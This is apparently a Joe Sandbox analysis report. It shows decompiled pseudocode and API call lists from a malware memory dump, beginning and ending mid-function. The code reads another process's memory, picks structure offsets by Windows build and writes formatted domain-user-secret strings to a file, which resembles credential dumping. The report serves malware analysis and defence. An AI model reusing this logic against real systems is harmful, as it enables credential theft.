				_t92 =  *_t94;
				if(_t92 == 0 || SetFilePointer( *( *(_t45 + 4)), _t92, 0, 0) != 0) {
					_push(0);
					_push( &_v16);
					_push(_a12);
					_push( *_t100);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t94[1] + 4)))));
					_push("WriteFile");
					goto L8;
				} else {
					goto L30;
				}
			}























    0x00f61155
    0x00f61158
    0x00f6115d
    0x00f61161
    0x00f6116b
    0x00f6116d
    0x00f61171
    0x00f61238
    0x00f6123b
    0x00f61240
    0x00f61242
    0x00f612d7
    0x00f612df
    0x00f61343
    0x00f6134d
    0x00f6134d
    0x00f61248
    0x00f61249
    0x00f612c5
    0x00f611e1
    0x00f611e1
    0x00000000
    0x00f611e1
    0x00f6124b
    0x00f6124c
    0x00f612ab
    0x00000000
    0x00f612b0
    0x00f6124e
    0x00f6124f
    0x00f6128f
    0x00f61290
    0x00f61292
    0x00f61295
    0x00f61204
    0x00f61207
    0x00f6120b
    0x00000000
    0x00f61210
    0x00f61254
    0x00000000
    0x00f61272
    0x00f61272
    0x00f61277
    0x00f61278
    0x00f6127e
    0x00f61283
    0x00f61285
    0x00f611cd
    0x00f611df
    0x00000000
    0x00f611df
    0x00f61254
    0x00f61177
    0x00f61178
    0x00f61215
    0x00f6121d
    0x00f612e9
    0x00f612e9
    0x00f612ec
    0x00f61305
    0x00f61307
    0x00f6130d
    0x00f61322
    0x00f61335
    0x00f61335
    0x00f6133d
    0x00f6133d
    0x00000000
    0x00f6130d
    0x00f61230
    0x00000000
    0x00f61230
    0x00f6117f
    0x00f61180
    0x00f611ea
    0x00f611ed
    0x00f611f2
    0x00000000
    0x00000000
    0x00f611f8
    0x00f611fb
    0x00f611fd
    0x00f611ff
    0x00000000
    0x00f611ff
    0x00f61185
    0x00000000
    0x00000000
    0x00f6118b
    0x00f61193
    0x00000000
    0x00000000
    0x00f61199
    0x00f6119d
    0x00f611b5
    0x00f611ba
    0x00f611bb
    0x00f611c1
    0x00f611c6
    0x00f611c8
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
    • GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F63303, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 156
    C-Code - Quality: 90%
    			E00F63303(intOrPtr __eax) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				char _v28;
				short _v2076;
				void* __esi;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t49;
				signed int _t56;
				intOrPtr* _t59;
				signed int _t70;
				signed int _t75;
				signed int _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				void* _t82;
				signed int _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t87;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t94;

				_t40 = __eax;
				_t75 = 0;
				_t86 = __eax;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v28 = 0;
				if( *((intOrPtr*)(__eax + 4)) != 0 ||  *((intOrPtr*)(__eax + 0xc)) != 0 ||  *((intOrPtr*)(__eax + 0x14)) != 0) {
					_t77 =  *0xf6cd68; // 0x0
					_t88 = _t86; // executed
					_t41 = E00F61EFA(_t77, _t86); // executed
					if(_t41 != 0 && E00F61F6D(_t77, _t88) != 0) {
						_v20 = _t86;
					}
					_t78 =  *0xf6cd68; // 0x0
					_t89 = _t86 + 8;
					_t42 = E00F61EFA(_t78, _t89); // executed
					if(_t42 != 0 && E00F61F6D(_t78, _t89) != 0) {
						_v16 = _t89;
					}
					_t79 =  *0xf6cd68; // 0x0
					_t90 = _t86 + 0x10;
					if(E00F61EFA(_t79, _t90) != 0) {
						_t49 =  *0xf6cec0; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x10))))( *((intOrPtr*)(_t86 + 0x14)),  *(_t86 + 0x12) & 0x0000ffff);
						if(E00F61F6D( *(_t86 + 0x12) & 0x0000ffff, _t90) != 0) {
							_v12 = _t90;
							if(_t90 != _t75) {
								_t87 = E00F63168(_v20);
								_v8 = E00F63168(_v16);
								_t76 = E00F63168(_v12);
								_v24 = _t76;
								if(_v8 == 0) {
									_t56 = 0;
								} else {
									_t70 = StrChrW(_t87, 0x5c);
									asm("sbb eax, eax");
									_t56 =  !( ~_t70) & _v8;
								}
								if(_t76 == 0) {
									_t76 = 0xf69d58;
								}
								_t94 = _t87;
								if(_t87 == 0) {
									_t94 = 0xf69d58;
								}
								if(_t56 == 0) {
									L21:
									_t84 = 0xf69d58;
								} else {
									_t84 = "\\";
									if(_t87 == 0) {
										goto L21;
									}
								}
								if(_t56 == 0) {
									_t56 = 0xf69d58;
								}
								wsprintfW( &_v2076, L"%lS%lS%lS:%lS", _t56, _t84, _t94, _t76);
								_t59 =  &_v2076;
								_t82 = _t59 + 2;
								do {
									_t85 =  *_t59;
									_t59 = _t59 + 2;
								} while (_t85 != 0);
								_push(0);
								_push( &_v28);
								_push((_t59 - _t82 >> 1) + (_t59 - _t82 >> 1) + 2);
								_push( &_v2076);
								_push( *0xf6bfb8);
								 *(GetProcAddress(GetModuleHandleW(L"kernel32"), "WriteFile"))();
								if(_t87 != 0) {
									LocalFree(_t87);
								}
								if(_v8 != 0) {
									LocalFree(_v8);
								}
								if(_v24 != 0) {
									LocalFree(_v24);
								}
								_t75 = 0;
							}
						}
					}
					_t44 = _v20;
					if(_t44 != _t75) {
						LocalFree( *(_t44 + 4));
					}
					_t45 = _v16;
					if(_t45 != _t75) {
						LocalFree( *(_t45 + 4));
					}
					_t40 = _v12;
					if(_t40 != _t75) {
						return LocalFree( *(_t40 + 4));
					}
				}
				return _t40;
			}

































    0x00f63303
    0x00f6330d
    0x00f63311
    0x00f63313
    0x00f63316
    0x00f63319
    0x00f6331c
    0x00f63322
    0x00f63332
    0x00f63338
    0x00f6333a
    0x00f63341
    0x00f6334c
    0x00f6334c
    0x00f6334f
    0x00f63355
    0x00f63358
    0x00f6335f
    0x00f6336a
    0x00f6336a
    0x00f6336d
    0x00f63373
    0x00f6337d
    0x00f63387
    0x00f63393
    0x00f6339c
    0x00f633a2
    0x00f633a7
    0x00f633b8
    0x00f633c2
    0x00f633ce
    0x00f633d0
    0x00f633d3
    0x00f633e9
    0x00f633d5
    0x00f633d8
    0x00f633e0
    0x00f633e4
    0x00f633e4
    0x00f633f2
    0x00f633f4
    0x00f633f4
    0x00f633f6
    0x00f633fa
    0x00f633fc
    0x00f633fc
    0x00f63400
    0x00f6340b
    0x00f6340b
    0x00f63402
    0x00f63402
    0x00f63409
    0x00000000
    0x00000000
    0x00f63409
    0x00f6340f
    0x00f63411
    0x00f63411
    0x00f63423
    0x00f63429
    0x00f63432
    0x00f63435
    0x00f63435
    0x00f63438
    0x00f6343b
    0x00f63446
    0x00f6344a
    0x00f6344f
    0x00f63456
    0x00f63457
    0x00f63474
    0x00f63478
    0x00f6347b
    0x00f6347b
    0x00f63484
    0x00f63489
    0x00f63489
    0x00f63492
    0x00f63497
    0x00f63497
    0x00f6349d
    0x00f6349d
    0x00f633a7
    0x00f6339c
    0x00f6349f
    0x00f634a4
    0x00f634a9
    0x00f634a9
    0x00f634af
    0x00f634b4
    0x00f634b9
    0x00f634b9
    0x00f634bf
    0x00f634c4
    0x00000000
    0x00f634c9
    0x00f634c4
    0x00f634d3

    APIs
      • Part of subcall function 00F61EFA: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61F38
      • Part of subcall function 00F61EFA: GetProcAddress.KERNEL32(00000000), ref: 00F61F3F
    • LocalFree.KERNEL32(?), ref: 00F634C9
      • Part of subcall function 00F61F6D: IsCharAlphaNumericW.USER32(?), ref: 00F61F83
      • Part of subcall function 00F61F6D: IsTextUnicode.ADVAPI32(?,?,?), ref: 00F61F98
      • Part of subcall function 00F63168: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000002,00F69BE0,00F6323C), ref: 00F63182
      • Part of subcall function 00F63168: GetProcAddress.KERNEL32(00000000), ref: 00F63189
    • StrChrW.SHLWAPI(00000000,0000005C), ref: 00F633D8
    • wsprintfW.USER32(?,%lS%lS%lS:%lS,00000000,00F69D58,00000000,00000000), ref: 00F63423
    • GetModuleHandleW.KERNEL32(kernel32,WriteFile,?,?,?,00000000), ref: 00F63467
    • GetProcAddress.KERNEL32(00000000), ref: 00F6346E
    • LocalFree.KERNEL32(00000000), ref: 00F6347B
    • LocalFree.KERNEL32(00000000), ref: 00F63489
    • LocalFree.KERNEL32(?), ref: 00F63497
    • LocalFree.KERNEL32(?), ref: 00F634A9
    • LocalFree.KERNEL32(?), ref: 00F634B9
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F629EA, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 130
    C-Code - Quality: 80%
    			E00F629EA(void** _a4, long _a8, intOrPtr* _a12) {
				intOrPtr _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				char _v48;
				intOrPtr _t52;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t67;
				void* _t70;
				void* _t74;
				intOrPtr* _t76;
				void* _t86;
				intOrPtr* _t87;

				_v20 = _v20 & 0x00000000;
				_v28 = _a4;
				_t52 =  *((intOrPtr*)(_a8 + 8));
				_v24 = 0xf6cd30;
				if(_t52 >= 0x1f40) {
					if(_t52 >= 0x24b8) {
						_a8 = 0x3c;
						_v12 = 0x34;
					} else {
						_a8 = 0x28;
						_v12 = 0x20;
					}
				} else {
					_a8 = 0x20;
					_v12 = 0x18;
				}
				_push(_a8);
				_push(0x40);
				_t86 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
				_v16 = _t86;
				if(_t86 == 0) {
					L18:
					return _v20;
				} else {
					_t58 = E00F61149( &_v28, _a4, 4); // executed
					if(_t58 != 0) {
						_t61 = E00F61149( &_v28, _a4, 4); // executed
						if(_t61 != 0) {
							_v28 =  &_v48;
							_t64 = E00F61149( &_v28, _a4, 0x14); // executed
							if(_t64 != 0 && _v44 == 0x55555552) {
								 *_a4 = _v36;
								_v28 = _t86;
								_t67 = E00F61149( &_v28, _a4, _a8); // executed
								if(_t67 != 0 &&  *((intOrPtr*)(_t86 + 4)) == 0x4d53534b) {
									_t87 = _t86 + _v12;
									_push( *_t87);
									_push(0x40);
									_t70 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
									_v28 = _t70;
									if(_t70 != 0) {
										 *_a4 = _v36 + _v12 + 4;
										_t74 = E00F61149( &_v28, _a4,  *_t87); // executed
										if(_t74 != 0) {
											_t76 = _a12;
											_t40 = _t76 + 4; // 0x4
											_v20 = 0 |  *0xf6cd54( *_t76, _t40,  *((intOrPtr*)(_t76 + 8)),  *((intOrPtr*)(_t76 + 0xc)), _v28,  *_t87, 0) > 0x00000000;
										}
										LocalFree(_v28);
									}
									_t86 = _v16;
								}
							}
						}
					}
					LocalFree(_t86);
					goto L18;
				}
			}





















    0x00f629f3
    0x00f629f7
    0x00f629fd
    0x00f62a03
    0x00f62a0f
    0x00f62a26
    0x00f62a38
    0x00f62a3f
    0x00f62a28
    0x00f62a28
    0x00f62a2f
    0x00f62a2f
    0x00f62a11
    0x00f62a11
    0x00f62a18
    0x00f62a18
    0x00f62a46
    0x00f62a4f
    0x00f62a68
    0x00f62a6a
    0x00f62a6f
    0x00f62b75
    0x00f62b7c
    0x00f62a75
    0x00f62a7e
    0x00f62a88
    0x00f62a97
    0x00f62aa1
    0x00f62aaf
    0x00f62ab6
    0x00f62ac0
    0x00f62add
    0x00f62ae3
    0x00f62ae6
    0x00f62af0
    0x00f62afb
    0x00f62afe
    0x00f62b00
    0x00f62b11
    0x00f62b13
    0x00f62b18
    0x00f62b27
    0x00f62b30
    0x00f62b3a
    0x00f62b3c
    0x00f62b43
    0x00f62b5f
    0x00f62b5f
    0x00f62b65
    0x00f62b65
    0x00f62b6b
    0x00f62b6b
    0x00f62af0
    0x00f62ac0
    0x00f62aa1
    0x00f62b6f
    0x00000000
    0x00f62b6f

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,0000003C,00000000,?,00000000), ref: 00F62A5B
    • GetProcAddress.KERNEL32(00000000), ref: 00F62A64
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000034), ref: 00F62B0C
    • GetProcAddress.KERNEL32(00000000), ref: 00F62B0F
    • LocalFree.KERNEL32(?), ref: 00F62B65
    • LocalFree.KERNEL32(00000000), ref: 00F62B6F
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F62E19, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 243
    C-Code - Quality: 96%
    			E00F62E19(intOrPtr _a4) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				intOrPtr _v60;
				char _v64;
				void* _v68;
				void* _v72;
				char* _v76;
				char _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				void* _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v108;
				void _v112;
				intOrPtr _v116;
				void _v120;
				signed int _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				signed int _v133;
				void* __esi;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				void* _t120;
				void* _t124;
				void _t126;
				void* _t129;
				void* _t130;
				void* _t137;
				void* _t141;
				void* _t143;
				void* _t145;
				void* _t153;
				intOrPtr _t181;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t192;
				intOrPtr* _t196;
				intOrPtr _t198;
				signed int _t207;
				void* _t209;

				_t209 = (_t207 & 0xfffffff8) - 0x7c;
				_t198 = 0xf6cd30;
				_v120 = 1;
				_v104 =  &_v120;
				_v100 = 0xf6cd30;
				_v88 = 0;
				_v84 = 0xf6cd30;
				_v116 = 1;
				_t108 = E00F62B7D();
				_v108 = _t108;
				if(_t108 < 0) {
					L38:
					return _v108;
				} else {
					_t110 =  *0xf6cec0; // 0x0
					_v52 = _t110;
					_t111 =  *0xf6cd74; // 0x0
					_v56 = 0xf6cd68;
					if(_t111 >= 0xbb8) {
						__eflags = _t111 - 0x1388;
						if(_t111 >= 0x1388) {
							__eflags = _t111 - 0x1b58;
							if(_t111 >= 0x1b58) {
								__eflags = _t111 - 0x1f40;
								if(_t111 >= 0x1f40) {
									_t196 = 0xf69cc4;
									__eflags = _t111 - 0x24b8;
									if(_t111 >= 0x24b8) {
										_t196 = 0xf69cf0;
									}
								} else {
									_t196 = 0xf69c6c;
								}
							} else {
								_t196 = 0xf69c40;
							}
						} else {
							_t196 = 0xf69c14;
						}
					} else {
						_t196 = 0xf69be8;
					}
					if(_t111 + 0xffffe4a8 <= 0x95f &&  *0xf6bb98 > 0x53480000) {
						_t196 = _t196 + 0x2c;
					}
					_t113 =  *0xf6cd68; // 0x0
					_v92 = _t113;
					_t114 =  *0xf6cd80; // 0x0
					_v96 = _t114;
					if(_t114 != 0) {
						E00F61149( &_v104,  &_v96, 4); // executed
						_t209 = _t209 + 0xc;
					}
					_v124 = 0;
					if(_v120 > 0) {
						do {
							_push( *_t196);
							_t115 =  *0xf6cd7c; // 0x0
							_push(0x40);
							_v96 = _t115 + _v124 * 8;
							_v104 =  &_v112;
							_v100 = _t198;
							_t120 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
							_v96 = _t120;
							if(_t120 == 0) {
								goto L37;
							}
							_t124 = E00F61149( &_v112,  &_v104, 4); // executed
							_t209 = _t209 + 0xc;
							if(_t124 == 0) {
								L36:
								LocalFree(_v96);
								_t198 = 0xf6cd30;
								goto L37;
							}
							_t126 = _v120;
							_v108 = _v100;
							while(1) {
								_v112 = _t126;
								if(_t126 == _v104) {
									goto L36;
								}
								__eflags = _v124;
								if(_v124 == 0) {
									goto L36;
								}
								_t129 = E00F61149( &_v96,  &_v112,  *_t196); // executed
								_t209 = _t209 + 0xc;
								__eflags = _t129;
								if(_t129 == 0) {
									goto L36;
								}
								_t130 = _v96;
								_t34 = _t196 + 4; // 0x40
								_t35 = _t196 + 0x10; // 0x50
								_v56 =  *_t34 + _t130;
								_t37 = _t196 + 8; // 0x74
								_v44 =  *((intOrPtr*)(_t130 +  *_t37));
								_t40 = _t196 + 0xc; // 0x7c
								_v40 =  *((intOrPtr*)(_t130 +  *_t40));
								_t43 = _t196 + 0x14; // 0x58
								_v48 =  *_t43 + _t130;
								_t45 = _t196 + 0x18; // 0x90
								_v52 =  *_t35 + _t130;
								_v36 =  *((intOrPtr*)(_t130 +  *_t45));
								_t49 = _t196 + 0x1c; // 0x70
								_v32 =  *((intOrPtr*)(_t130 +  *_t49));
								_t52 = _t196 + 0x20; // 0xc0
								_v28 =  *((intOrPtr*)(_t130 +  *_t52));
								_t55 = _t196 + 0x24; // 0x80
								_t181 =  *_t55;
								_v24 =  *((intOrPtr*)(_t181 + _t130));
								_v20 =  *((intOrPtr*)(_t181 + _t130 + 4));
								_t61 = _t196 + 0x28; // 0x88
								_v16 =  *_t61 + _t130;
								_t185 =  *0xf6cd68; // 0x0, executed
								E00F61EFA(_t185,  *_t35 + _t130);
								_t186 =  *0xf6cd68; // 0x0
								E00F61EFA(_t186, _v48);
								_t187 =  *0xf6cd68; // 0x0
								E00F61EFA(_t187, _v16); // executed
								_v80 =  &_v133;
								_v76 =  &_v72;
								_v72 = 0;
								_v68 = 0;
								_v32 = 0;
								_v88 = _v32 + 1;
								_t192 =  *0xf6cd68; // 0x0
								_v84 = _t192;
								_t137 = E00F61149( &_v80,  &_v88, 1); // executed
								_t209 = _t209 + 0xc;
								__eflags = _t137;
								if(__eflags != 0) {
									_v88 = _v88 - 1;
									_t206 = 8 + (_v133 & 0x000000ff) * 4;
									_push(8 + (_v133 & 0x000000ff) * 4);
									_push(0x40);
									_t153 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
									_v88 = _t153;
									__eflags = _t153;
									if(__eflags != 0) {
										_v40 = _t153;
										E00F61149( &_v88,  &_v96, _t206); // executed
										_t209 = _t209 + 0xc;
									}
								}
								_v132 = E00F63285(__eflags,  &_v64, _a4);
								_t141 =  *(_v60 + 4);
								__eflags = _t141;
								if(_t141 != 0) {
									LocalFree(_t141);
								}
								_t143 =  *(_v48 + 4);
								__eflags = _t143;
								if(_t143 != 0) {
									LocalFree(_t143);
								}
								_t145 =  *(_v16 + 4);
								__eflags = _t145;
								if(_t145 != 0) {
									LocalFree(_t145);
								}
								__eflags = _v32;
								if(_v32 != 0) {
									LocalFree(_v32);
								}
								_t126 =  *_v96;
							}
							goto L36;
							L37:
							_v132 = _v132 + 1;
						} while (_v132 < _v128);
					}
					goto L38;
				}
			}




























































    0x00f62e1f
    0x00f62e2b
    0x00f62e33
    0x00f62e37
    0x00f62e3b
    0x00f62e3f
    0x00f62e43
    0x00f62e47
    0x00f62e4b
    0x00f62e50
    0x00f62e56
    0x00f6315d
    0x00f63167
    0x00f62e5c
    0x00f62e5c
    0x00f62e61
    0x00f62e65
    0x00f62e6a
    0x00f62e77
    0x00f62e80
    0x00f62e85
    0x00f62e8e
    0x00f62e93
    0x00f62e9c
    0x00f62ea1
    0x00f62eaa
    0x00f62eaf
    0x00f62eb4
    0x00f62eb6
    0x00f62eb6
    0x00f62ea3
    0x00f62ea3
    0x00f62ea3
    0x00f62e95
    0x00f62e95
    0x00f62e95
    0x00f62e87
    0x00f62e87
    0x00f62e87
    0x00f62e79
    0x00f62e79
    0x00f62e79
    0x00f62ec5
    0x00f62ed3
    0x00f62ed3
    0x00f62ed6
    0x00f62edb
    0x00f62edf
    0x00f62ee4
    0x00f62eea
    0x00f62ef8
    0x00f62efd
    0x00f62efd
    0x00f62f00
    0x00f62f08
    0x00f62f14
    0x00f62f14
    0x00f62f16
    0x00f62f22
    0x00f62f24
    0x00f62f36
    0x00f62f3a
    0x00f62f47
    0x00f62f49
    0x00f62f4f
    0x00000000
    0x00000000
    0x00f62f61
    0x00f62f66
    0x00f62f6b
    0x00f6313c
    0x00f63140
    0x00f63146
    0x00000000
    0x00f63146
    0x00f62f75
    0x00f62f79
    0x00f6312e
    0x00f6312e
    0x00f63136
    0x00000000
    0x00000000
    0x00f62f82
    0x00f62f87
    0x00000000
    0x00000000
    0x00f62f99
    0x00f62f9e
    0x00f62fa1
    0x00f62fa3
    0x00000000
    0x00000000
    0x00f62fa9
    0x00f62fad
    0x00f62fb2
    0x00f62fb5
    0x00f62fb9
    0x00f62fbf
    0x00f62fc3
    0x00f62fc9
    0x00f62fcd
    0x00f62fd2
    0x00f62fd6
    0x00f62fdb
    0x00f62fe2
    0x00f62fe6
    0x00f62fec
    0x00f62ff0
    0x00f62ff6
    0x00f62ffa
    0x00f62ffa
    0x00f63000
    0x00f63008
    0x00f6300f
    0x00f63014
    0x00f6301b
    0x00f63021
    0x00f63026
    0x00f63030
    0x00f63035
    0x00f63042
    0x00f6304d
    0x00f63055
    0x00f6305d
    0x00f63061
    0x00f63065
    0x00f63071
    0x00f63075
    0x00f63080
    0x00f63084
    0x00f63089
    0x00f6308c
    0x00f6308e
    0x00f63095
    0x00f63099
    0x00f630a0
    0x00f630a1
    0x00f630b6
    0x00f630b8
    0x00f630bc
    0x00f630be
    0x00f630c0
    0x00f630cf
    0x00f630d4
    0x00f630d4
    0x00f630be
    0x00f630ea
    0x00f630f2
    0x00f630f5
    0x00f630f7
    0x00f630fa
    0x00f630fa
    0x00f63100
    0x00f63103
    0x00f63105
    0x00f63108
    0x00f63108
    0x00f63111
    0x00f63114
    0x00f63116
    0x00f63119
    0x00f63119
    0x00f6311b
    0x00f63120
    0x00f63126
    0x00f63126
    0x00f6312c
    0x00f6312c
    0x00000000
    0x00f6314b
    0x00f6314b
    0x00f63153
    0x00f62f14
    0x00000000
    0x00f62f08

    APIs
      • Part of subcall function 00F62B7D: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F62BE8
      • Part of subcall function 00F62B7D: OpenProcess.KERNEL32(00F6BD30,00000000,?), ref: 00F62C0C
      • Part of subcall function 00F62B7D: GetCurrentProcess.KERNEL32(?), ref: 00F62CB6
      • Part of subcall function 00F62B7D: IsWow64Process.KERNEL32(00000000), ref: 00F62CBD
      • Part of subcall function 00F62B7D: CloseHandle.KERNEL32(?), ref: 00F62DB4
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00F69CC4), ref: 00F62F3E
    • GetProcAddress.KERNEL32(00000000), ref: 00F62F45
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
      • Part of subcall function 00F61EFA: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61F38
      • Part of subcall function 00F61EFA: GetProcAddress.KERNEL32(00000000), ref: 00F61F3F
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F630AD
    • GetProcAddress.KERNEL32(00000000), ref: 00F630B4
    • LocalFree.KERNEL32(00000002,?,00F69BE0), ref: 00F630FA
    • LocalFree.KERNEL32(00000002,?,00F69BE0), ref: 00F63108
    • LocalFree.KERNEL32(00000002,?,00F69BE0), ref: 00F63119
    • LocalFree.KERNEL32(00000000), ref: 00F63126
    • LocalFree.KERNEL32(?), ref: 00F63140
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    Function 00F619EE, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 261
    C-Code - Quality: 76%
    			E00F619EE(intOrPtr __eax, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _v24;
				signed short _v26;
				void* _v28;
				void* _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v84;
				char _v88;
				unsigned int _v92;
				intOrPtr _v104;
				char _v112;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v152;
				char _v172;
				void* __edi;
				void* __esi;
				intOrPtr _t121;
				char _t125;
				intOrPtr _t132;
				void* _t133;
				void* _t136;
				void* _t141;
				char _t143;
				intOrPtr _t146;
				unsigned int _t150;
				void* _t154;
				void* _t159;
				void* _t164;
				intOrPtr _t181;
				intOrPtr _t183;
				intOrPtr* _t185;
				intOrPtr* _t186;
				char _t193;
				intOrPtr* _t194;
				intOrPtr* _t195;
				intOrPtr* _t201;
				intOrPtr _t211;
				void* _t213;
				intOrPtr _t215;
				void* _t216;
				void* _t218;
				intOrPtr* _t219;
				char* _t220;
				char* _t221;
				char* _t222;
				void* _t225;
				void* _t226;
